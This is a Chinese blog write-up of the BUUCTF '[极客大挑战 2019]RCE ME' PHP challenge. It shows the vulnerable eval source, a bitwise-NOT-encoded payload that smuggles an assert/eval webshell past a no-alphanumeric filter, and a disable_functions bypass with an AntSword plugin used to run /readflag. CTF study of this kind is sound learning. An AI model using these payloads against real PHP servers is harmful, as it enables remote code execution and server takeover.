练[极客大挑战 2019]RCE ME

最新推荐文章于 2024-05-20 17:20:00 发布
最新推荐文章于 2024-05-20 17:20:00 发布
阅读量137 收藏 1
点赞数 1
分类专栏: buuctf刷题 文章标签: web安全 笔记 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_66225311/article/details/133497166
版权

[极客大挑战 2019]RCE ME

文章目录


在这里插入图片描述

掌握知识

RCE无数字和字母的bypass,取反 异或 递增

解题思路

  1. 打开题目链接,发现是代码审计的题目,而且代码比较简单,似乎关键就是RCE无数字字母的bypass,之前有接触过,这次使用取反来进行执行一句话木马代码
<?php
error_reporting(0);
if(isset($_GET['code'])){
            $code=$_GET['code'];
                    if(strlen($code)>40){
                                        die("This is too Long.");
                                                }
                    if(preg_match("/[A-Za-z0-9]+/",$code)){
                                        die("NO.");
                                                }
                    @eval($code);
}
else{
            highlight_file(__FILE__);
}
// ?>
  1. 使用之前保存的经过取反之后的一句话木马paylaod
(~%9E%8C%8C%9A%8D%8B)(~%9A%89%9E%93%D7%DB%A0%AF%B0%AC%AB%A4%CE%A2%D6%C4);
assert(eval($_POST[1]);)
  1. 但是取反的paylaod长度多余40了,不知道什么原因可以通过长度判断,可能url判断%9e为一个字符串吧。使用蚁剑连接或者post传参执行命令都能查看靶场目录环境,进而拿下flag

image-20231002165623751

  1. 但是查看根目录下的flag文件,发现是空的,下面还有的readflag文件。应该是有权限限制不能直接查看flag,需要执行readflag才能查看到flag。来到虚拟终端准备执行readflag,但是发现命令都回显ret=127

image-20231002165834471

  1. 通过在网上的搜索,这种情况需要上传几个php文件或者使用蚁剑的插件来自动绕过,插件需要梯子下载。下载好disable_functions插件,选好对应的php版本,执行之后直接弹出了虚拟终端,发现可以执行命令了,执行readflag,拿下flag

image-20231002165935446

image-20231002165820841

关键paylaod

(~%9E%8C%8C%9A%8D%8B)(~%9A%89%9E%93%D7%DB%A0%AF%B0%AC%AB%A4%CE%A2%D6%C4);
assert(eval($_POST[1]);)

disable_functions插件
生而逢时
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
cve_2019_0708_bluekeep_rce:蓝皮漏洞利用
04-29
cve_2019_0708_bluekeep_rce.rb 添加 /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb rdp.rb 替换 /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb ...
cve_2019_0708_bluekeep_rce.rb
09-07
2019年5月14日微软官方发布安全补丁,修复了Windows远程桌面服务的远程代码执行漏洞,该漏洞影响了某些旧版本的Windows系统。此漏洞是预身份验证且无需用户交互,这就意味着这个漏洞可以通过网络蠕虫的方式被利用。...
BUUCTF[极客挑战 2019]RCE ME1
wyp106343873的博客
12-06 735
一个个人的学习过程
[极客挑战 2019]RCE ME
m0_63253040的博客
09-26 1093
r:运行PHP代码,而无需使用脚本标记“..?>”
[极客挑战 2019]RCE ME 1
plant1234的博客
06-24 2826
首先打开题目得到: 发现是代码审计传入的code不能大于40并且不能包含a到z的大小写字符和1到10的数字我们可以通过不在这个字符集里的字符进行绕过可以采用异或和取反这里我采用取反,绕过执行phpinfo();playload: 执行:发现对一些行数进行控制: 写一句话: 在这里,我们不能直接使用eval 因为 eval并不是php函数 所以为我们无法通过变量函数的方法进行调用。 在这里,我们使用 assert 来构造,但由于php版本问题,我们并不能直接构造...
[极客挑战 2019]RCE ME 取反绕过正则匹配 绕过disable_function设置
m0_64180167的博客
09-22 674
有意思。。。。过滤了数字字母我们要绕过并且执行rce这里使用取反和异或都可以。
BUUCTF:[极客挑战 2019]RCE ME
末初的CSDN博客
03-27 8344
这题和我这篇文章内容相关:关于PHP正则的一些绕过方法 绕过正则,有长度限制,先出一个phpinfo()看一下配置,payload很多,我上面那篇文章里面的也可以,我这里直接用取反urlencode编码绕过 PS C:\Users\Administrator> php -r "echo urlencode(~'phpinfo');" ...
CTF-Web-[极客挑战 2019]RCE ME 1
m0_69637056的博客
07-25 303
rce
BUUCTF:[极客挑战 2019]RCE ME ——两种方法
m0_62879498的博客
05-16 3502
BUUCTF:[极客挑战 2019]RCE ME 打开环境是 代码审计题 <?php error_reporting(0); if(isset($_GET['code'])){ $code=$_GET['code']; if(strlen($code)>40){ die("This is too Long.");
极客挑战 2019 php,[极客挑战 2019]RCE ME
weixin_39986896的博客
03-27 197
[极客挑战 2019]RCE ME前面考察取反或者异或绕过, 后面读 Flag 那里我用脏方法过了, 没看出来考察啥进入题目给出源码:
[极客挑战 2019]RCE ME (无字母数字RCE+有长度限制)
开心星人的博客
09-01 1074
利用蚁剑插件:disable_functions,右键数据->加载插件->辅助工具->绕过disable_functions->然后选择PHP7_GC_UAF->点击开始,然后直接输入命令/readflag,即可得到flag。根目录下有flag,但是无法读取。我们先构造phpinfo()antsword连接url时。取反得到payload。将参数也带上,才能连上。...
[极客挑战 2019]RCE ME1 ~~不会编程的崽
不会编程的崽的博客
02-15 604
rce 取反绕过
CVE-2019-19781 Citrix Application Delivery Controller和RCE.MD
04-13
CVE-2019-19781 Citrix Application Delivery Controller和RCE
sangfor EDR RCE
03-29
# Sangfor EDR RCE 影响版本: - EDR v3.2.16 - EDR v3.2.17 - EDR v3.2.19 exp: ``` python poc.py url http://10.10.10.0/ ```
rce-website:RCE网站
05-09
RCE网站RCE的主页(登录页面)和公告( )。 基于和修改的Polar主题。本地安装安装Python3( 完美运行) 安装Pelican和支持库pip install invoke==1.4.1pip install pelican==3.7.1pip install markdown==3.1.1如果...
HCIP-Datacom-ARST自选题库_02_网络安全【道题】
2301_80961833的博客
05-20 477
为了防止黑客通过MAC地址攻击用户设备或网络,可将非信任用户的MAC地址配置为黑洞MAC地址,过滤掉非法MAC地址。中间人攻击或IP/MAC Spoofing攻击都会导致信息泄露等危害,且在内网中比较常见,为了防止中间人攻击或IP/MACSpoofing攻击,可以采取以下哪些配置手段?多远题461/805、为了防止仿冒DHCP服务器接入网络,可以在交换机上开启DHCP Snooping功能,配置步骤包括以下哪些选项?开启DHCP Snooping检查DHCP REQUEST报文中CHADDR字段的功能。
web安全之登录框渗透骚姿势,新思路
qq_47289634的博客
05-10 580
越权漏洞的挖掘大部分是通过对比两个用户的请求包以及响应包,来观察不同之处,有的时候替换一下响应包就直接越权,其中特别要关注的是uid,这里在挖掘逻辑漏洞和越权漏洞时建议使用burp中的compare模块进行两个数据包的比对,非常直观。width=500&height=100导致可以随意更改大小,配合脚本批量请求,很容易就会把带宽占满,造成dos攻击。不管漏洞挖掘还是挖SRC,登录框都是重点关注对象,什么漏洞都有可能出现,登录框也是框,见框就插就对了,说不定会有奇效。看到登录框,输入信息后,抓包。
网站有存在哪些类型的漏洞,网站漏洞存在哪些危害,该怎么解决网站漏洞问题
dexunyun的博客
05-14 359
通过使用漏洞扫描VSS服务,我们可以及时发现网站存在的漏洞,有效降低网站漏洞的风险,保障网站安全,满足合规要求。文件上传漏洞是由于网站在处理文件上传功能时没有对上传的文件类型、大小等进行严格的验证和过滤,攻击者利用网站中的文件包含函数,将恶意文件或代码包含到网站中,从而实现远程代码执行或文件读取。网站安全是一个持续的过程,需要我们不断关注,通过及时发现存在的漏洞,我们可以针对性的处理,这样可以有效地减少网站安全漏洞的产生和危害,确保网站的安全稳定运行。同时,采用安全的编程语言和框架,减少漏洞的产生。
Upstream最新发布2024年汽车网络安全报告-百度网盘下载
最新发布
qq_18209847的博客
05-20 136
Levy总结道:“在负责保护车队、电动汽车充电站和基础设施的网络安全利益相关者中,对汽车网络安全的重要性日益增加。特别是在GenAI日益普及的情况下,其降低了黑帽子行为者的进入门槛,使他们能够比以往更快、更有效地进行大规模攻击。这份报告的第六版着重介绍了汽车网络安全的拐点:从实验性的黑客攻击发展到规模庞大的攻击,并产生了怎样的影响。另外今年的报告还提供了关于网络攻击的财务影响的独到见解,它提供了一个可操作的框架,用于在现实场景中衡量网络攻击的货币影响。
ctfshow RCE极限挑战
10-20
ctfshow RCE极限挑战是一种CTF比赛中的挑战,要求选手通过注入恶意代码来实现远程代码执行(Remote Code Execution,RCE)。在这个挑战中,选手需要在一个给定的代码中找到漏洞并注入自己的代码,以实现对服务器的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值